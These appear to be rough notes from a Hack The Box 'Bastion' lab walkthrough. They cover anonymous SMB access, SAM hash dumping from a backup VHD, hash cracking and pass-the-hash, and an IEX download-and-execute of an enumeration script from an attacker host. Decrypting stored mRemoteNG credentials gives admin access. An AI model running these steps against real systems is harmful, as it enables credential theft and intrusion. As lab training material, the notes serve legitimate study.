
10.10.10.134
ippsec.rocks/?#locat
https://www.hackthebox.eu/home/machines/profile/186 https://overflow.uaacyber.dev/2019/09/bastion.html https://0xrick.github.io/hack-the-box/bastion/ https://github.com/kmahyyg/mremoteng-decrypt https://www.elasticice.net/?p=255

nmap -sV -sC -oA nmap/Bastion 10.10.10.134

Scan the host as anonymous for open smb shares using SMBMap. Install SMBMap 
python3 -m pip install -r requirements.txt
List Shares that have no password: smbclient –list //bastion.htb/ -U ‘ 
Looks like Backups is the only Comment that doesn’t say we cant access
smbclient //10.10.10.134/Backups -U

press l to list


So we need to mount the VHD in the other directory 
cd Backup 
See the VHD
Mount Backups mount -t cifs //10.10.10.134/Backups /mnt/smb 
cat note.txt 
use &zip if you want to see files… however we will just mount the vhd using guestmount 7z l 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
#################################### mkdir /mnt/vhd2 guestmount –add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd –inspector –ro -v /mnt/vhd2
to mount a VHD you need this: apt install libguestfs-tools
Create a mount directory to use for the mount mkdir /mnt/vhd2
Use guestmount to mount the VHD guestmount –add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd –inspector –ro -v /mnt/vhd2 
Find files in these directories find Desktop Documents/ Downloads/ -ls 
Go into vhd2 and navigate to config in Windows to obtain SAM and SYSTEM files 
cp SAM SYSTEM /root/htb/bastion cd /root/htb/bastion mkdir backup-dump mv SAM SYSTEM backup-dump/ cd backup-dump/ 
root@kali:~/htb/bastion/backup-dump# impacket-secretsdump -sam SAM -system SYSTEM local

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
NOTICE the Administrator NT HASH is BLANK aka 31d6c and the LM hash of aad3, which means the Administrative account is disabled.
try to crack the L4mpje hash 26112010952d963c8dc4217daec986d9
https://crackstation.net/ 
bureaulampje
OR pass the hash smbmap -u L4mpje -p ad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9 -H 10.10.10.134
ssh L4mpje@10.10.10.134 bureaulampje

net localgroup administrators net user l4mpje net user administrator
now that you see administrator has logged in… time to Priv Esc
Grab from Kali JAWS Enumeration powershell github
git clone https://github.com/411Hall/JAWS.git
On TARGET: powershell IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.14:8000/jaws-enum.ps1’) 
In ANOTHER Windows root@kali:~/htb/bastion# echo l4mpje:bureaulampje > creds root@kali:~/htb/bastion# ls backup-dump creds JAWS mountstuf nmap smbmap root@kali:~/htb/bastion# cat creds l4mpje:bureaulampje root@kali:~/htb/bastion# ssh l4mpje@10.10.10.134 
type C:\Users\L4mpje\Desktop\user.txt
PS C:\Users\L4mpje> type C:\Users\L4mpje\Desktop\user.txt 9bfe57d5c3309db3a151772f9d86c6cd
git clone https://github.com/411Hall/JAWS.git

python -m SimpleHTTPServer
On the TARGET: powershell IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.14:8000/jaws-enum.ps1’)
Looking through the JAWS output we see a programx86 as mRemoteNG

After manually enumerating installed programs mRemoteNG stands out of interest. Tool is used to remotely access server resources and is suggested to store credentials in an insecure manner. Credentials for application noted as being stored in file confCons.xml. Copy of the confCons.xml file obtained from %USER%/AppData/Roaming/mremoteng/confCons.xmland reviewed.
Two items of interest found from reviewing file are below. File appears to store RDP credentialsfor user Administrator and L4mpje. 
Download decrypt python tool https://github.com/kmahyyg/mremoteng-decrypt
Download the mRemotNG confCons.xml from target scp l4mpje@10.10.10.134:/Users/L4mpje/AppData/Roaming/mRemoteNG/confCons.xml . 
cat confCons.xml | grep Password 
Username=Administrator Domain= Password=aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw== Hostname=127.0.0.1 Protocol=RDP 
root@kali:~/htb/bastion/mremoteng-decrypt# python mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw== Password: thXLHM96BeKL0ER2
Now SSH with that password as Administrator ssh administrator@10.10.10.134
administrator@BASTION C:\Users\Administrator\Desktop>type root.txt 958850b91811676ed6620a9c430e65c8 